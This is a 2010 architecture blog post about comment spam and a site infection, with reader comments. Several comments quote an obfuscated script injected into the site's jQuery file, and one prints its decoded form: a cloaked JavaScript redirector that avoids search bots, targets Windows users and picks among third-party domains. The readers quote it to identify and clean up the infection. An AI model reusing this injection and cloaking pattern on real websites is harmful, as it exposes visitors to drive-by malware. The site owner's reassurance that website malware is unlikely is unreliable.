The Eye of the Fish

Maximus
July 18, 2010

Spamalotnot


We’ve had a couple of comments recently about the site being infected, and have updated things so it should be alright. It’s hard for me to tell if there is anything wrong with the site – its not like there is a giant animated green troll that bleurgs it’s way out of the screen and warns us. But here we are, cleansing away, ready to start blasting the dimensional portal while crossing the proton streams to reverse the particle flow, desplurging the cosmic array and uploading the assorted grunge into the containment grid in the basement…

Anyway – just thought it may be interesting to show you some samples of the over 14,000 spam that have been sent to attack the site, and why we closed comments on older posts, to limit the sheer amount of crap getting through. We were getting up to 50 a day at one stage, and it was getting tedious to check. If you’re sending us a link to another website, do it just one link at a time, or you’ll end up getting crammed with the flammers in the damn spam jammer. Many of you already have your own websites, so will be used to that – occasionally your comments get caught up in the spam-filter, and we have to reach in, delve around inside the slime and muck, and pull your comment back out of the bag. Eeurgh, its a messy job, but someone has to do it.

The spam filter performs admirably: none of these shown here ever got through. Fear not. You can relax, as these are no longer live spams, but they have been captured via screengrab, humanely killed, and flash frozen like an alien predator, available only as a jpeg for your viewing pleasure. They can, and will, do you no harm. You can click away: there are no live links. But it is just an example of the mostly boring, mainly offensive, and very occasionally amusing spam that the site gets.

This one here recently caught my fish eye – it almost seemed real, but it is not a service that we really offer. Presumably just another spambot roaming the interwebs, randomly procreating on our website. Sorry ‘fella’ you’ll just have to go elsewhere for that…

Most of the spam are in English, or some variant of it, and very occasionally one in French, German, and even once in Arabic. But while they’re in English, and mostly about viagra or ciallis, they mostly seem to come from Russia, while I think this one below came from Poland. Thank heavens then for the great Firewall of China – it keeps their spam in, as well as keeping Google out.

But enough of all that – back to normal transmission shortly !

davidp
18 - 07 - 10

Does someone know what the specific name of the malware that EOT Fish was trying to infect us with was? That’d make it easier to check if people were vulnerable and infected.

Spencer
18 - 07 - 10

I still get a message that “Threat was blocked” and refers to file

eyeofthefish.org/wp-content/themes/eye3/js/jquery.center.js

It might just be a false alarm on my computer (Firefox 3.01 on Vista, using AVG Free 9.0.389) but worth checking out that file, which is a valid file for JQuery, however this is what the start of the proper one looks like
/**
* @author Alexandre Magno
* @desc Center a element with jQuery
* @version 1.0
* @example
* $(“element”).center({
*
* vertical: true,
* horizontal: true
*
* });
* @obs With no arguments, the default is above
* @license free
* @param bool vertical, bool horizontal
* @contribution Paulo Radichi
*
*/
jQuery.fn.center = function(params) {

and this is the start of what your web server is trying to send me…

var st1 = 0;document.write(unescape(‘%3C%73%63%72%69%70%74%3E%76%61%72%20%64%63%2
….

60 MPa
18 - 07 - 10

Join Linux – we don’t get that shite.

“People say that if you run Microsoft Midori backwards you hear the sound of the Devil. That’s nothing – if you run it forwards it installs Microsoft Midori”

Maximus
19 - 07 - 10

Spencer – thanks for that – hopefully Philip will be able to target that directly.

Philip
20 - 07 - 10

Apologies for the disruption in service over the course of today, hopefully everything nasty should be snuffed out for good now. Please let me know if this is not the case.

Also, in regards to davidp, its extremely unlikely to get malware from a website; I wouldnt worry about it unless your running an old operating system (XP or similar) as well as an old browser (version 6 or less of internet explorer) and also accidentally clicked/accepted whatever popup/dialog the site was offering. If so, the standard spyware/anti-virus scanning tools should be more than enough.

The old theme will hopefully be restored soon, and ill work on upgrading the spam filter….

davidp
20 - 07 - 10

Philip… I keep browser and opsys patched, but I don’t bother with anti-virus software. I doubt I’d be infected by an infected web site, but you never know.

Once unescaped, the dodgy javascript resolved to the following:

var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;
if(document.cookie.indexOf(“watchtime”)==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf(“win”)!=-1){var d=[“edisonsnightclub.com”,”gaindirectory.org”,”ideacoreportal.com”,”karenegren.com”],e=[“aqua.”,”azure.”,”black.”,”blue.”,”brown.”,”chocolate.”,”coral.”,”cyan.”,”darkred.”,”fuchsia.”,”gold.”,”gray.”,”green.”,”indigo.”,”ivory.”,”khaki.”,”lime.”,”magenta.”,”maroon.”,”navy.”,”olive.”,”orange.”,”pink.”,”plum.”,”purple.”,”red.”,”silver.”,”snow.”,”violet.”,”white.”,”yellow.”],f=Math.floor(Math.random()* d.length),g=Math.floor(Math.random()*e.length);
dt=new Date;dt.setTime(dt.getTime()+9072E4);
document.cookie=”watchtime=”+escape(“watchtime”)+”;
expires=”+dt.toGMTString()+”;
path=/”;
document.write(”)};

I haven’t written programs for years and have no idea what that does. The references to specific web sites makes me suspect it is advertising related tho. Anyone?

starkive
22 - 07 - 10

You OK under there?

maximus
22 - 07 - 10

Yes thanks, we’re ok ! Hopefully, spam and virus all gone ?
How was your holiday in Sydney ?

starkive
22 - 07 - 10

Seen via Safari on a Mac, the site seems to have been gill netted and gaffed. Most of it is missing and the rest is strangely whited-out. I had no problems with the original virus scare, but things look pretty fishy to me now…

Although to be fair we seem to have got a one-click comments count back.

Maximus
23 - 07 - 10

No, starkive, the whited out look (like the soft stomach flesh of a white bellied lemon shark) is just another ‘theme’ on the blogging software, while Philip takes the original one back to the basement and beats the heck out of it till it behaves itself.

I think (and hope) that we (he) will have another (or the same one, revamped), back, soon.

And I’ll get back to posting soon (ish). I think.